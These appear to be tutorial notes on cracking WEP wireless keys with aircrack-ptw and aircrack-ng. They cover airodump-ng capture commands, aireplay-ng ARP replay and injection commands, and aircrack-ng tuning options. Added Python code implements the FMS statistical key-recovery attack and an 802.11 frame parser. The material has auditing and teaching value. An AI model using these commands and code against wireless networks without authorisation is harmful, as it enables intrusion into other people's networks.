26oct08
aircrack-ptw is quite similar to aircrack-ng. You can find a very good tutorial on the aircrack-ng homepage. For aircrack-ptw you need to make some little changes.
* In Step 3, you MUST NOT use the parameter --ivs (aircrack-ptw needs the packet contents, not only the IVs). Just skip this parameter; the other command line arguments still apply.
* In Step 5, you should use aircrack-ptw instead of aircrack-ng. ls -la output*.cap will give you a list of the capture files airodump-ng has created. Usually, if you did not interrupt airodump-ng, there should be only one file named output-01.cap. Just start aircrack-ptw output-01.cap to get the key. If aircrack-ptw was not successful, wait a few seconds (so that more packets are captured) and start it again.
Please make sure that you have the libpcap development files installed. On Debian or Ubuntu, you can do this with apt-get install libpcap0.8-dev.
aircrack-ng is a set of tools for auditing wireless networks. It's an enhanced/reborn version of aircrack. It consists of airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), airdecap (decrypts WEP/WPA capture files), and some tools to handle capture files (merge, convert, etc.).
http://www.aircrack-ng.org - Version: 0.5 April 2006
airodump-ng
Term 1 - Capture IVs in the traffic
airodump-ng -w out -c 8 --ivs ath0
* -w out: our output filenames start with the prefix "out"
* -c 8: only look at channel #8 (2.447 GHz)
* --ivs: collect only the IVs, not the entire packets
* ath0: network capture interface, should be reported by ifconfig/iwconfig
* Can verify BSSID, Channel, Encryption, ESSID when the interface comes up
  o also written to the "out-1.txt" file, a very handy reference for the info below
* We want about 100k packets to be recorded under the "# Data" column
aircrack-ng
Term 2 - Try to crack the key based on IVs
aircrack-ng -a 1 -b AP_MAC -n 64 out-1.ivs
* -a 1: force WEP cracking mode (2 for WPA)
* -b AP_MAC: the MAC address of the AP
* -n 64: WEP key length of 64 bits (use 128 for a 128-bit key)
* out-1.ivs: the IVs file written by airodump-ng
The new aircrack-ng incorporates the KoreK statistical attacks on WEP, which greatly reduce the number of IVs required before the key can be recovered. Because the attack is statistical, aircrack may on occasion fail to find the key even with plenty of IVs, so you may need to adjust some of these options (from the manpage):
* -f <fudge>
  o By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.
* -k <korek>
  o There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
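To see what aircrack-ng actually does with the IVs collected in Term 1, here is an added example (my own Python, not aircrack-ng's code) of the original FMS form of the attack, which KoreK's 17 attacks generalize. Every WEP packet is RC4-encrypted under IV || key with the IV sent in the clear, and the first plaintext byte of every data frame is the LLC/SNAP byte 0xAA, so the first keystream byte of every packet is known. For certain "weak" IVs the RC4 key schedule leaks the next unknown key byte into that first keystream byte with roughly 5% probability; each such packet casts a vote, the right byte collects the most votes, and a fudge factor decides how many runners-up get tried when a false positive wins. Assumptions: the capture is constructed in-process and contains the classic weak IVs (A+3, 255, x) for every key byte (in a real 100k-IV capture only a small fraction of IVs are weak, which is why that volume is needed), the key is 40-bit, the ICV is omitted, and the fudge factor is simplified to "try the top N candidates per byte", checking each full candidate key against the known plaintext.

```python
"""FMS-style statistical WEP key recovery; the KoreK attacks in aircrack-ng are a
refined superset of this. Added example, not aircrack-ng code. The capture is
constructed in-process with a known key so the result can be checked."""
import random

SNAP = bytes.fromhex("aaaa030000000806")   # LLC/SNAP header of an ARP frame: known plaintext
N_VERIFY = 8                                # packets used to check a full key candidate


def rc4_keystream(key, n):
    S, j = list(range(256)), 0
    for i in range(256):                    # key scheduling (KSA)
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):                      # keystream generation (PRGA)
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv, secret, plaintext):
    """WEP per-packet key is IV || secret; the IV is sent in clear (ICV omitted here)."""
    ks = rc4_keystream(iv + secret, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def wep_decrypt(packet, secret):
    ks = rc4_keystream(packet[:3] + secret, len(packet) - 3)
    return bytes(c ^ k for c, k in zip(packet[3:], ks))


def make_capture(secret, n_random=1000, seed=1):
    """Constructed capture: the 256 weak IVs (A+3, 255, x) for each key byte A, which
    old WEP drivers emitted in sequence, plus random IVs standing in for normal traffic."""
    rng = random.Random(seed)
    pkts = [wep_encrypt(bytes([a + 3, 255, x]), secret, SNAP)
            for a in range(len(secret)) for x in range(256)]
    pkts += [wep_encrypt(bytes(rng.randrange(256) for _ in range(3)), secret, SNAP)
             for _ in range(n_random)]
    rng.shuffle(pkts)
    return pkts


def vote_key_byte(pkts, prefix):
    """Tally FMS votes for secret key byte number len(prefix), given the bytes before it."""
    a = len(prefix)
    votes = [0] * 256
    for p in pkts:
        key = p[:3] + prefix                # IV || already recovered key bytes
        S, j = list(range(256)), 0
        for i in range(a + 3):              # only the KSA steps that use known key bytes
            j = (j + S[i] + key[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        x = S[1]                            # "resolved" IV: S[1] < A+3 and S[1] + S[S[1]] == A+3
        if x >= a + 3 or (x + S[x]) & 0xFF != a + 3:
            continue
        z1 = p[3] ^ SNAP[0]                 # first keystream byte, from the known plaintext
        votes[(S.index(z1) - j - S[a + 3]) & 0xFF] += 1   # right ~5% of the time, noise otherwise
    return votes


def verify_key(secret, pkts):
    """Full-key check: a candidate must decrypt the SNAP header of several packets."""
    return all(wep_decrypt(p, secret)[:2] == SNAP[:2] for p in pkts[:N_VERIFY])


def crack(pkts, keylen, fudge=4):
    """Depth-first search over the top `fudge` candidates per byte (simplified fudge factor)."""
    def search(prefix):
        if len(prefix) == keylen:
            return prefix if verify_key(prefix, pkts) else None
        votes = vote_key_byte(pkts, prefix)
        for cand in sorted(range(256), key=lambda b: -votes[b])[:fudge]:
            found = search(prefix + bytes([cand]))
            if found is not None:
                return found
        return None
    return search(b"")


if __name__ == "__main__":
    key = bytes.fromhex("1f2a3b4c5d")       # 40-bit WEP key (constructed)
    recovered = crack(make_capture(key), 5)
    print("recovered key:", recovered.hex() if recovered else None)
```

Printing the tally from vote_key_byte for one byte shows the picture behind -f and -k: with few weak IVs the correct byte can rank second or third behind a noisy candidate, which is exactly the case a larger fudge factor covers, and a structural false positive (one wrong value that consistently outvotes the right one) is what -k disables by dropping the attack that produces it.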
aireplay-ng
Term 3 - Generate more traffic, get more IVs, speed up cracking
ARP Attack
This attack requires at least one client already associated with the AP/router (wired or wireless). Once an ARP request is seen, aireplay-ng "replays" that ARP request repeatedly, triggering many ARP replies, each encrypted with a new unique IV. WEP has no replay protection, so the AP accepts the re-injected frame every time. This rapidly increases the number of IVs airodump-ng records and so speeds up aircrack-ng's recovery of the WEP key.
The CLIENT_MAC must be the system that sends the ARP request, so it may be necessary to "initialize" the attack by sending a ping from the CLIENT_MAC machine to the AP or to another wireless client on the network. Once this happens, aireplay-ng should report a rapidly increasing count of ARP requests read and sent (which confirms that the attack is working), and airodump-ng should show a rapidly increasing "# Data" (IV) count.
Note: The out-1.txt file from airodump-ng can be referenced for the required MAC addresses.
aireplay-ng -3 -b AP_MAC -h CLIENT_MAC ath0
* -3: ARP replay attack
* -b <AP_MAC>: supply the MAC address of the AP
* -h <CLIENT_MAC>: supply the MAC address of a wireless client
* ath0: interface to use
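Both the "# Data" count in Term 1 and the ARP detection in Term 3 work on the cleartext 802.11 header alone: the IV sits in the first three bytes after the header, and an encrypted ARP request is recognisable without the key by its fixed size and its broadcast destination. The following is an added Python example (mine, not the aircrack-ng code and not part of the original notes) with a minimal parser for WEP data frames run over a constructed capture; it assumes non-QoS frames with a 24-byte header and an ARP request body of 8 LLC/SNAP + 28 ARP bytes.

```python
"""Parse WEP data frames from the unencrypted 802.11 header: IV counting and
ARP-request spotting. Added example, not aircrack-ng code; capture is constructed."""
import struct

BROADCAST = b"\xff" * 6
# Encrypted ARP request on the air: 24-byte 802.11 header, 4-byte IV + key index,
# 8-byte LLC/SNAP and 28-byte ARP body (encrypted), 4-byte ICV. Assumes no QoS field.
ARP_FRAME_LEN = 24 + 4 + 8 + 28 + 4


def build_wep_data_frame(to_ds, addr1, addr2, addr3, iv, body_len, seq=0):
    """Constructed WEP data frame; the ciphertext is zero filler, only the header matters."""
    fc1 = 0x40 | (0x01 if to_ds else 0x02)          # Protected flag plus ToDS or FromDS
    header = (bytes([0x08, fc1]) + struct.pack("<H", 0)        # type=data, duration
              + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4))
    return header + iv + b"\x00" + bytes(body_len) + bytes(4)  # IV, key index, body, ICV


def build_beacon(bssid):
    """Constructed management frame (beacon): carries no IV and must be ignored."""
    return bytes([0x80, 0x00, 0, 0]) + BROADCAST + bssid + bssid + bytes(2) + bytes(20)


def parse_frame(frame):
    """Header fields of a WEP-protected, non-WDS data frame, or None for anything else."""
    if len(frame) < 28:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 3 != 2 or not fc1 & 0x40:      # type must be data, Protected bit set
        return None
    to_ds, from_ds = fc1 & 1, (fc1 >> 1) & 1
    if to_ds and from_ds:                           # WDS frames carry a 4th address; skipped
        return None
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if to_ds:                                       # client -> AP: BSSID, SA, DA
        bssid, sa, da = a1, a2, a3
    elif from_ds:                                   # AP -> client: DA, BSSID, SA
        da, bssid, sa = a1, a2, a3
    else:                                           # ad-hoc: DA, SA, BSSID
        da, sa, bssid = a1, a2, a3
    return {"bssid": bssid, "sa": sa, "da": da, "to_ds": bool(to_ds),
            "iv": frame[24:27], "len": len(frame)}


def count_ivs(frames, bssid):
    """Distinct IVs seen for one BSSID: what airodump-ng's "# Data" column tracks."""
    ivs = set()
    for f in frames:
        p = parse_frame(f)
        if p and p["bssid"] == bssid:
            ivs.add(p["iv"])
    return len(ivs)


def find_arp_requests(frames, bssid):
    """Client->AP frames of ARP-request size sent to the broadcast MAC: the frames
    aireplay-ng -3 replays. Returns (source MAC, frame) pairs."""
    hits = []
    for f in frames:
        p = parse_frame(f)
        if (p and p["bssid"] == bssid and p["to_ds"]
                and p["da"] == BROADCAST and p["len"] == ARP_FRAME_LEN):
            hits.append((p["sa"], f))
    return hits


def sample_capture():
    """Constructed capture: a beacon, 3 ARP requests from the client, the AP's reply,
    one replayed request (same frame, same IV), a bigger unicast frame, another BSSID."""
    ap, client = bytes.fromhex("00112233aabb"), bytes.fromhex("001122ccddee")
    other_ap = bytes.fromhex("00aabbccdd00")
    frames = [build_beacon(ap)]
    for n in range(3):
        frames.append(build_wep_data_frame(True, ap, client, BROADCAST, bytes([1, 0, n]), 36, seq=n))
    frames.append(build_wep_data_frame(False, client, ap, ap, bytes([2, 0, 0]), 36))
    frames.append(frames[1])                        # replay: identical frame, identical IV
    frames.append(build_wep_data_frame(True, ap, client, ap, bytes([3, 0, 0]), 200))
    frames.append(build_wep_data_frame(True, other_ap, client, BROADCAST, bytes([1, 0, 0]), 36))
    return ap, frames


if __name__ == "__main__":
    ap, frames = sample_capture()
    print("unique IVs for AP:", count_ivs(frames, ap))
    for sa, _ in find_arp_requests(frames, ap):
        print("ARP request candidate from", sa.hex(":"))
```

The replayed frame counts as an ARP request but not as a new IV, which is the whole point of the attack: the replay itself adds nothing, the replies it provokes do.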
Pkt Injection
aireplay-ng -2 -b AP_MAC -h CLIENT_MAC ath0
* after reading about 10k packets, it will prompt for a response: "Use this packet?"
* then it proceeds with the injection attack
  o CLIENT_MAC should be on the network, an actual client of the AP, to get more packets
Results
The sample results below were obtained while running aircrack-ng, aireplay-ng and airodump-ng simultaneously. In this mode, aircrack-ng repeatedly attempts to crack the key based on all the IVs airodump-ng has collected so far in its output file. If aircrack-ng is run offline on an IVs file (of sufficient length) pre-recorded by airodump-ng, it generally cracks the key within seconds. With all three applications running at the same time, aircrack-ng runs significantly slower. Some example timing results (Your Mileage May Vary):
* crack 64-bit key with "aireplay -3": 41 min
* crack 64-bit key with "aireplay -2": 03 min
* crack 128-bit key with "aireplay -2": 15 min
* crack 128-bit key with "aireplay -3": 19 min
* crack 'strong password' 128-bit key with "aireplay -2": 2 hrs 38 min
  o 'strong password' random ASCII text used from: https://www.grc.com/passwords
  o Note: More testing and research may be required to determine whether this final result is an anomaly: whether this key happens to be unaffected by the KoreK attacks, whether there are weaknesses in the generator that derives WEP keys from a passphrase, or whether by sheer chance this key simply took longer to crack.